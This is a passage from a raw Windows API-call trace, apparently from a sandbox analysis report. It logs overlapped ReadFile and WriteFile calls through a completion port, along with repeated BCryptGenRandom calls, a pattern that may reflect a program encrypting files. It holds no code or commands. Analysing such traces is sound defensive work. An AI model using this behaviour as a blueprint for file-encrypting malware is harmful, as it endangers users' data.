lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.203] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x7c10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0168.203] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.212] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1e60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.212] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.221] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0168.228] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0168.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0168.237] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.237] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.237] free (_Block=0x3e305b8) [0168.237] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.237] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.238] free (_Block=0x1fa91d0) [0168.238] free (_Block=0x1fa2ed8) [0168.238] free (_Block=0x1fa90b8) [0168.238] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.238] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.247] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0168.247] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.250] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0168.251] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.251] CloseHandle (hObject=0x338) returned 1 [0168.251] free (_Block=0x3e70008) [0168.251] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.253] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1c94, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0168.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.254] CloseHandle (hObject=0x170) returned 1 [0168.254] free (_Block=0x3df0008) [0168.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.372] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x9abe, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0168.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.373] CloseHandle (hObject=0x308) returned 1 [0168.373] free (_Block=0x3ef0008) [0168.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.399] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x451e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0168.400] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.400] CloseHandle (hObject=0x308) returned 1 [0168.401] free (_Block=0x3df0008) [0168.401] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.410] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.411] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.412] CloseHandle (hObject=0x170) returned 1 [0168.412] free (_Block=0x1ff1e60) [0168.412] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.422] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0168.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.423] CloseHandle (hObject=0x308) returned 1 [0168.423] free (_Block=0x3df0008) [0168.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.441] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6afc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0168.442] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.442] CloseHandle (hObject=0x308) returned 1 [0168.442] free (_Block=0x3df0008) [0168.442] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.457] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.458] CloseHandle (hObject=0x170) returned 1 [0168.458] free (_Block=0x1ff1e60) [0168.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.472] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0168.473] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.473] CloseHandle (hObject=0x308) returned 1 [0168.473] free (_Block=0x3df0008) [0168.473] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.485] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7297, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.487] CloseHandle (hObject=0x170) returned 1 [0168.487] free (_Block=0x1ff1e60) [0168.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.497] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0168.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.613] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.613] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0168.613] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.614] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0168.614] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.614] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.614] free (_Block=0x3e305b8) [0168.614] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.614] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.614] free (_Block=0x1fa91d0) [0168.614] free (_Block=0x1fa2ed8) [0168.614] free (_Block=0x1fa90b8) [0168.614] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.615] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.758] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.758] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.060] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.062] CloseHandle (hObject=0x308) returned 1 [0169.062] free (_Block=0x3df0008) [0169.062] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.074] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.074] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.075] CloseHandle (hObject=0x170) returned 1 [0169.075] free (_Block=0x1ff1e60) [0169.075] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.086] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xdd5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.086] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.086] CloseHandle (hObject=0x308) returned 1 [0169.086] free (_Block=0x3df0008) [0169.086] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.096] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.097] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.097] CloseHandle (hObject=0x170) returned 1 [0169.098] free (_Block=0x1ff1e60) [0169.098] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.109] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7c08, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.109] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.113] CloseHandle (hObject=0x308) returned 1 [0169.113] free (_Block=0x3df0008) [0169.113] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.121] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x48fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.122] CloseHandle (hObject=0x170) returned 1 [0169.122] free (_Block=0x1ff1e60) [0169.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.137] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.138] CloseHandle (hObject=0x170) returned 1 [0169.138] free (_Block=0x3df0008) [0169.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.429] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x8499, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.445] CloseHandle (hObject=0x308) returned 1 [0169.445] free (_Block=0x1ff1e60) [0169.446] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.657] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x639b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.684] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.686] CloseHandle (hObject=0x170) returned 1 [0169.686] free (_Block=0x3df0008) [0169.686] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.697] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7e90, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.706] CloseHandle (hObject=0x308) returned 1 [0169.706] free (_Block=0x1ff1e60) [0169.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.717] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8118, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.718] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.718] CloseHandle (hObject=0x170) returned 1 [0169.719] free (_Block=0x3df0008) [0169.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0169.747] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5f2b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, 